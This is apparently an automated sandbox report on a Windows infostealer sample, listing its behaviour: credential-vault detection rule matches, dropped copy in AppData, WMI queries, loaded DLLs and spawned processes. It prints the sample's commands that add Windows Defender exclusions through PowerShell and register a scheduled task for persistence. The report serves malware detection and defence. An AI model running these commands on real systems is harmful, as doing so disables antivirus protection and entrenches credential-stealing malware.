                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_06124C0010_2_06124C00
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_0612629810_2_06126298
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_061262A810_2_061262A8
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_0105938017_2_01059380
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_01059BF817_2_01059BF8
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_01054AA017_2_01054AA0
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_01053E8817_2_01053E88
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_0105CE8817_2_0105CE88
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_010541D017_2_010541D0
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F2DD0017_2_05F2DD00
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F2BCE817_2_05F2BCE8
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F23F3017_2_05F23F30
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F256C017_2_05F256C0
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F2A89017_2_05F2A890
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F2004017_2_05F20040
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F28B7817_2_05F28B78
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F22AF017_2_05F22AF0
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F29AB817_2_05F29AB8
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F25D0817_2_05F25D08
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F24FE017_2_05F24FE0
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F2A35017_2_05F2A350
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F2323817_2_05F23238
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_01059BF017_2_01059BF0
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2023593017.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed54a4dfb-b711-44c1-af5f-04d55f847873.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed54a4dfb-b711-44c1-af5f-04d55f847873.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2023593017.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2032144320.0000000005630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2032823086.0000000005F50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2017591310.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3256233551.0000000001369000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed54a4dfb-b711-44c1-af5f-04d55f847873.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeBinary or memory string: OriginalFilenameglVB.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: TuZRpLi.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, c2bZQnG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, c2bZQnG.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, Q1L0K.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, Q1L0K.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, jnOEI4PSUDb1Xcqy8J.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, jnOEI4PSUDb1Xcqy8J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/15@1/1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeFile created: C:\Users\user\AppData\Roaming\TuZRpLi.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8319.tmpJump to behavior
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeReversingLabs: Detection: 18%
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeVirustotal: Detection: 29%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe C:\Users\user\AppData\Roaming\TuZRpLi.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeProcess created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
